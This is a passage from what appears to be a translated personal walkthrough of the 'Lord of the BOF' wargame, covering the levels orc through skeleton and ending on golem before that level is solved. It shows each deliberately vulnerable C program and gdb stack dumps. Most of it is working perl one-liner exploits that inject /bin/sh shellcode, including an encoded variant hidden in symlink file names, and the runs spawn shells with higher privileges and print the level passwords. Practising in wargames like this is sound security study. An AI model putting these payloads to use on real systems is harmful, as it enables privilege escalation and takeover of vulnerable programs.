        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter: wipes every environment string, so an EGG variable cannot be used
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);   /* unbounded copy into a 40-byte stack buffer */
        printf("%s\n", buffer);
}
[goblin@localhost goblin]$


0x80485d7 <main+215>:   ret   




./ttt "`perl -e '{print "A"x40,"BBBB","\xbf\xff\xff\xbf","\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`" 



[goblin@localhost goblin]$ ./orc "`perl -e '{print "A"x40,"BBBB","\xdV\xfa\xff\xbf","\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB幾??方??^?핂F덯    N?1???汪/bin/sh

bash$ id                                                         ?됹

uid=503(goblin) gid=503(goblin) euid=504(orc) egid=504(orc) groups=503(goblin)

bash$ /bin/my-pass

euid = 504

cantata

bash$ whoami

orc

bash$



========================================================================

[orc@localhost orc]$ cat wolfman.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - wolfman
        - egghunter + buffer hunter
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* added: memset, strlen, strcpy */

extern char **environ;

int main(int argc, char *argv[])
{
   char buffer[40];
   int i;

   if(argc < 2){
    printf("argv error\n");
    exit(0);
   }

   // egghunter
   for(i=0; environ[i]; i++)
    memset(environ[i], 0, strlen(environ[i]));

   if(argv[1][47] != '\xbf')
   {
    printf("stack is still your friend.\n");
    exit(0);
   }
   strcpy(buffer, argv[1]);   /* unbounded copy into a 40-byte stack buffer */
   printf("%s\n", buffer);

        // buffer hunter: clears the buffer after the copy, so code placed in it is gone by the time main returns
        memset(buffer, 0, 40);
}
[orc@localhost orc]$



cp wolfman ttttttt


[orc@localhost orc]$ ./ttttttt "`perl -e '{print "A"x40,"BBBB","AAA\xbf","\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBAAA??方??^?핂F덯    N?1???汪/bin/sh

Segmentation fault (core dumped)                                 ?됹

[orc@localhost orc]$ gdb ./ttttttt core

0xbffffbd0:     0x00000000      0x00000000      0x00000000      0x38366900

0xbffffbe0:     0x2f2e0036      0x74747474      0x00747474      0x41414141

0xbffffbf0:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffffc00:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffffc10:     0x41414141      0x42424242      0xbf414141      0xdb31c031

0xbffffc20:     0x80cd17b0      0x895e1feb      0xc0310876      0x89074688

0xbffffc30:     0x0bb00c46      0x4e8df389      0x0c568d08      0xdb3180cd

0xbffffc40:     0xcd40d889      0xffdce880      0x622fffff      0x732f6e69

0xbffffc50:     0x00000068      0x00000000      0x00000000      0x00000000

0xbffffc60:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffc70:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffc80:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffc90:     0x00000000      0x00000000      0x00000000      0x00000000


"`perl -e '{print "A"x40,"BBBB","\x1c\xfc\xff\xbf","\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`" 



[orc@localhost orc]$ ./wolfman "`perl -e '{print "A"x40,"BBBB","\x1c\xfc\xff\xbf","\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`" 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB???方??^?핂F덯    N?1???汪/bin/sh

bash$ id                                                        ?됹

uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc)

bash$ /bin/my-pass

euid = 505

love eyuna

bash$ whoami

wolfman

bash$



====================================================================================

[wolfman@localhost wolfman]$ cat darkelf.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - darkelf
        - egghunter + buffer hunter + check length of argv[1]
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* added: memset, strlen, strcpy */

extern char **environ;

int main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        // (the limit of 48 is larger than the 40-byte buffer, so this check does not prevent the overflow)
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);
}
[wolfman@localhost wolfman]$



Hmm.. passing the shellcode as the second argument works -_-;


"`perl -e '{print "A"x40,"BBBB","AAA\xbf"}'`" "`perl -e '{print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`" 



4141

(gdb)

0xbffffc30:     0x42424241      0x41414142      0xc03100bf      0x17b0db31

0xbffffc40:     0x1feb80cd      0x0876895e      0x4688c031      0x0c468907



"`perl -e '{print "A"x40,"BBBB","\x3a\xfc\xff\xbf"}'`" "`perl -e '{print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`" 



[wolfman@localhost wolfman]$ ./darkelf "`perl -e '{print "A"x40,"BBBB","\x3a\xfc\xff\xbf"}'`" "`perl -e '{print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`" 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB:??

                                                 bash$ whoami

darkelf

bash$ id

uid=505(wolfman) gid=505(wolfman) euid=506(darkelf) egid=506(darkelf) groups=505(wolfman)

bash$ /bin/my-pass

euid = 506

kernel crashed

bash$






================================================================================

[darkelf@localhost darkelf]$ cat orge.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - orge
        - check argv[0]
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* added: memset, strlen, strcpy */

extern char **environ;

int main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // here is changed!
        if(strlen(argv[0]) != 77){
                printf("argv[0] error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);
}
[darkelf@localhost darkelf]$


So in the end it has to be done through the file name -_-;;


It seems like it would work just by making the file name longer and using the second argument ㅡ.ㅡ; but let's solve it the way it's meant to be solved...

For that......... I need shellcode without / (0x2f)..


Should I study how to write shellcode.. -_-;

I thought about it.. but it's a hassle.... I'll just grab one from the internet..


// 25-byte shellcode

`perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`


// shellcode without / (0x2f) (48 bytes)

"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"


77 - 48 = 29

Since ./ is prepended, 27 bytes of padding.


ln -s tttt "`perl -e '{print "\x90"x27,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`"


[darkelf@localhost darkelf]$ ./`perl -e '{print "\x90"x27,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'` `perl -e '{print "A"x40,"BBBB", "CCC\xbf"}'`  

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCC?

                                                 Segmentation fault (core dumped)


0xbffffb50:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffb60:     0x00000000      0x36383669      0x902f2e00      0x90909090

0xbffffb70:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffb80:     0x90909090      0x11eb9090      0xb1c9315e      0x0e6c8032

0xbffffb90:     0xe98001ff      0xebf67501      0xffeae805      0xc132ffff

0xbffffba0:     0x30306951      0x30696974      0x8a6f6a63      0x8a5451e4

0xbffffbb0:     0x0cb19ae2      0x410081ce      0x41414141      0x41414141

(gdb)

0xbffffbc0:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffffbd0:     0x41414141      0x41414141      0x41414141      0x42414141

0xbffffbe0:     0x43424242      0x00bf4343      0x00000000      0x00000000

0xbffffbf0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffc00:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffc10:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffc20:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffc30:     0x00000000      0x00000000      0x00000000      0x00000000


[darkelf@localhost darkelf]$ ./`perl -e '{print "\x90"x27,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'` `perl -e '{print "A"x40,"BBBB", "\x70\xfb\xff\xbf"}'`     

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBp??

                                                 bash$ exit




[darkelf@localhost darkelf]$ ln -s orge "`perl -e '{print "\x90"x27,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`"

[darkelf@localhost darkelf]$ ./`perl -e '{print "\x90"x27,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'` `perl -e '{print "A"x40,"BBBB", "\x70\xfb\xff\xbf"}'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBp??

                                                 bash$ whoami

orge

bash$ id

uid=506(darkelf) gid=506(darkelf) euid=507(orge) egid=507(orge) groups=506(darkelf)

bash$ /bin/my-pass

euid = 507

timewalker

bash$                                                 



==================================================================================

[orge@localhost orge]$ cat troll.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - troll

        - check argc + argv hunter

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

        char buffer[40];

        int i;


        // here is changed

        if(argc != 2){

                printf("argc must be two!\n");

                exit(0);

        }


        // egghunter

        for(i=0; environ[i]; i++)

                memset(environ[i], 0, strlen(environ[i]));


        if(argv[1][47] != '\xbf')

        {

                printf("stack is still your friend.\n");

                exit(0);

        }


        // check the length of argument

        if(strlen(argv[1]) > 48){

                printf("argument is too long!\n");

                exit(0);

        }


        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);


        // buffer hunter

        memset(buffer, 0, 40);


        // one more!

        memset(argv[1], 0, strlen(argv[1]));

}

[orge@localhost orge]$

=================================================================================


[orge@localhost orge]$ ln -s ttttt "`perl -e '{print "\x90"x27,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`"                      

[orge@localhost orge]$ ./`perl -e '{print "\x90"x27,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'` `perl -e '{print "A"x40,"BBBB", "\x70\xfb\xff\xbf"}'`


(gdb) x/100x $esp

0xbffffa40:     0x00000000      0xbffffa84      0xbffffa90      0x40013868

0xbffffa50:     0x00000002      0x08048450      0x00000000      0x08048471

0xbffffa60:     0x08048500      0x00000002      0xbffffa84      0x08048390

0xbffffa70:     0x0804866c      0x4000ae60      0xbffffa7c      0x40013e90

0xbffffa80:     0x00000002      0xbffffb7e      0xbffffbcc      0x00000000

0xbffffa90:     0xbffffbfd      0xbffffc0c      0xbffffc24      0xbffffc43

0xbffffaa0:     0xbffffc65      0xbffffc6f      0xbffffe32      0xbffffe51

0xbffffab0:     0xbffffe6b      0xbffffe80      0xbffffe9c      0xbffffea7

0xbffffac0:     0xbffffeb4      0xbffffebc      0xbffffec6      0xbffffed6

0xbffffad0:     0xbffffee4      0xbffffef2      0xbfffff03      0xbfffff0e

0xbffffae0:     0xbfffff1e      0xbfffff5e      0x00000000      0x00000003

0xbffffaf0:     0x08048034      0x00000004      0x00000020      0x00000005

0xbffffb00:     0x00000006      0x00000006      0x00001000      0x00000007

0xbffffb10:     0x40000000      0x00000008      0x00000000      0x00000009

0xbffffb20:     0x08048450      0x0000000b      0x000001fb      0x0000000c

0xbffffb30:     0x000001fb      0x0000000d      0x000001fb      0x0000000e

0xbffffb40:     0x000001fb      0x00000010      0x0fabfbff      0x0000000f

0xbffffb50:     0xbffffb79      0x00000000      0x00000000      0x00000000

0xbffffb60:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffb70:     0x00000000      0x00000000      0x38366900      0x2f2e0036

0xbffffb80:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffb90:     0x90909090      0x90909090      0xeb909090      0xc9315e11

0xbffffba0:     0x6c8032b1      0x8001ff0e      0xf67501e9      0xeae805eb

0xbffffbb0:     0x32ffffff      0x306951c1      0x69697430      0x6f6a6330

0xbffffbc0:     0x5451e48a      0xb19ae28a      0x0081ce0c      0x00000030

(gdb) q

[orge@localhost orge]$


[orge@localhost orge]$ ln -s troll "`perl -e '{print "\x90"x27,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`"                      

[orge@localhost orge]$ ./`perl -e '{print "\x90"x27,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'` `perl -e '{print "A"x40,"BBBB", "\x80\xfb\xff\xbf"}'`

                                                 bash$ whoami

troll

bash$ id

uid=507(orge) gid=507(orge) euid=508(troll) egid=508(troll) groups=507(orge)

bash$ whoami

troll

bash$ /bin/my-pass

euid = 508

aspirin

bash$



========================================================================

[troll@localhost troll]$ cat vampire.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - vampire

        - check 0xbfff

*/


#include <stdio.h>

#include <stdlib.h>


main(int argc, char *argv[])

{

        char buffer[40];


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        if(argv[1][47] != '\xbf')

        {

                printf("stack is still your friend.\n");

                exit(0);

        }


        // here is changed!

        if(argv[1][46] == '\xff')

        {

                printf("but it's not forever\n");

                exit(0);

        }


        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

}

[troll@localhost troll]$


========================================================================


Hmm.. I'll have to make the buffer bigger..-_-


[troll@localhost troll]$ ./ttttttt "`perl -e '{print "A"x40,"BBBB","AA\xfa\xbf"}'`" "`perl -e '{print "A"x100000}'`"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBAA嚮

Segmentation fault (core dumped)


(gdb) x/100x $esp

0xbffe7460:     0x00000000      0xbffe74a4      0xbffe74b4      0x40013868

0xbffe7470:     0x00000003      0x08048380      0x00000000      0x080483a1

0xbffe7480:     0x08048430      0x00000003      0xbffe74a4      0x080482e0

0xbffe7490:     0x080484fc      0x4000ae60      0xbffe749c      0x40013e90

0xbffe74a0:     0x00000003      0xbffe75a2      0xbffe75ac      0xbffe75dd

0xbffe74b0:     0x00000000      0xbffffc7e      0xbffffc8e      0xbffffca6

0xbffe74c0:     0xbffffcc5      0xbffffce7      0xbffffcf2      0xbffffeb5

0xbffe74d0:     0xbffffed4      0xbffffeef      0xbfffff04      0xbfffff21

0xbffe74e0:     0xbfffff2c      0xbfffff3a      0xbfffff42      0xbfffff4c

0xbffe74f0:     0xbfffff5c      0xbfffff6a      0xbfffff78      0xbfffff89

0xbffe7500:     0xbfffff94      0xbfffffa5      0xbfffffe6      0x00000000

0xbffe7510:     0x00000003      0x08048034      0x00000004      0x00000020

0xbffe7520:     0x00000005      0x00000006      0x00000006      0x00001000

0xbffe7530:     0x00000007      0x40000000      0x00000008      0x00000000

0xbffe7540:     0x00000009      0x08048380      0x0000000b      0x000001fc

0xbffe7550:     0x0000000c      0x000001fc      0x0000000d      0x000001fc

0xbffe7560:     0x0000000e      0x000001fc      0x00000010      0x0fabfbff

0xbffe7570:     0x0000000f      0xbffe759d      0x00000000      0x00000000

0xbffe7580:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffe7590:     0x00000000      0x00000000      0x00000000      0x38366900

0xbffe75a0:     0x2f2e0036      0x74747474      0x00747474      0x41414141

0xbffe75b0:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffe75c0:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffe75d0:     0x41414141      0x42424242      0xbffa4141      0x41414100

0xbffe75e0:     0x41414141      0x41414141      0x41414141      0x41414141

(gdb)

0xbffe75f0:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffe7600:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffe7610:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffe7620:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffe7630:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffe7640:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffe7650:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffe7660:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffe7670:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffe7680:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffe7690:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffe76a0:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffe76b0:     0x41414141      0x41414141      0x41414141      0x41414141





[troll@localhost troll]$ ./ttttttt "`perl -e '{print "A"x40,"BBBB","\xb0\x76\xfe\xbf"}'`" "`perl -e '{print "\x90"x100000,"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"  

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB컑

bash$ exit

[troll@localhost troll]$ ./ "`perl -e '{print "A"x40,"BBBB","\xb0\x76\xfe\xbf"}'`" "`perl -e '{print "\x90"x100000,"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"      

.emacs   ttttttt  vampire 

[troll@localhost troll]$ ./vampire "`perl -e '{print "A"x40,"BBBB","\xb0\x76\xfe\xbf"}'`" "`perl -e '{print "\x90"x100000,"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB컑

bash$ id

uid=508(troll) gid=508(troll) euid=509(vampire) egid=509(vampire) groups=508(troll)

bash$ whoami

vampire

bash$ id

uid=508(troll) gid=508(troll) euid=509(vampire) egid=509(vampire) groups=508(troll)

bash$ /bin/my-pass

euid = 509

music world

bash$

bash$




================================================================================================

[vampire@localhost vampire]$ cat skeleton.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - skeleton

        - argv hunter

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

        char buffer[40];

        int i, saved_argc;


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        // egghunter

        for(i=0; environ[i]; i++)

                memset(environ[i], 0, strlen(environ[i]));


        if(argv[1][47] != '\xbf')

        {

                printf("stack is still your friend.\n");

                exit(0);

        }


        // check the length of argument

        if(strlen(argv[1]) > 48){

                printf("argument is too long!\n");

                exit(0);

        }


        // argc saver

        saved_argc = argc;


        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);


        // buffer hunter

        memset(buffer, 0, 40);


        // ultra argv hunter!

        for(i=0; i<saved_argc; i++)

                memset(argv[i], 0, strlen(argv[i]));

}

[vampire@localhost vampire]$

========================================================================================



ln -s tttttttt "`perl -e '{print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81","\x90"x100}'`"


./"`perl -e '{print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81","\x90"x100}'`" "`perl -e '{print "A"x40,"BBBB", "\xc0\xff\xff\xbf"}'`"



0xbfffff80:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffff90:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffffa0:     0x00000000      0x00000000      0x00000000      0x2f2e0000

0xbfffffb0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbfffffc0:     0x90909090      0x90909090      0xeb909090      0xc9315e11

0xbfffffd0:     0x6c8032b1      0x8001ff0e      0xf67501e9      0xeae805eb

0xbfffffe0:     0x32ffffff      0x306951c1      0x69697430      0x6f6a6330

0xbffffff0:     0x5451e48a      0xb19ae28a      0x0081ce0c      0x00000000

0xc0000000:     Cannot access memory at address 0xc0000000


ln -s tttttttt "`perl -e '{print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81","\x90"x100}'`"

./"`perl -e '{print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81","\x90"x100}'`" "`perl -e '{print "A"x40,"BBBB", "\x20\xff\xff\xbf"}'`"


Looks like a buffer is needed at the end.


[vampire@localhost vampire]$ ln -s skeleton "`perl -e '{print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81","\x90"x100}'`"

[vampire@localhost vampire]$ ./"`perl -e '{print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81","\x90"x100}'`" "`perl -e '{print "A"x40,"BBBB", "\x20\xff\xff\xbf"}'`"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB ?

                                                 bash$ id

uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)

bash$ whoami

skeleton

bash$ id

uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)

bash$ /bin/my-pass

euid = 510

shellcoder

bash$




================================================================================

[skeleton@localhost skeleton]$ cat golem.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - golem

        - stack destroyer

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

        char buffer[40];

        int i;


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        if(argv[1][47] != '\xbf')

        {

                printf("stack is still your friend.\n");

                exit(0);

        }


        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);


        // stack destroyer!

        memset(buffer, 0, 44);

        memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));

}

[skeleton@localhost skeleton]$


Hmm.. it wipes the whole stackㅡ.ㅡ;;

Environment variables won't work.. arguments won't work either-_-;

Only the EIP can be changed..


